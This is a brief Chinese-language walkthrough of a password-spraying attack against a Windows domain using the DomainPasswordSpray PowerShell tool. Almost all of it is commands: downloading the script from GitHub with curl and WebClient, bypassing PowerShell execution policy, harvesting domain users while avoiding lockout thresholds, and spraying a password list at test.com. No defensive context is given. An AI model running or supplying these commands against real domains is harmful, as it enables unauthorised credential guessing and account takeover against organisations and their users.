域密碼噴灑實現

域密碼噴灑

利用一個powershell工具完成DomainPasswordSpray

利用工具：DomainPasswordSpray

命令

下載工具

curl https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1 > C:\Users\Administrator\Desktop\1.ps1
powershell (new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1','C:\Users\Administrator\Desktop\12.ps1')

改變運行策略

Set-ExecutionPolicy Bypass -Scope Process

自動生成userlist

Get-DomainUserList -Domain test.com -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt

密碼噴灑

Invoke-DomainPasswordSpray -UserList userlist.txt -Domain test.com -PasswordList 1.txt -OutFile test.txt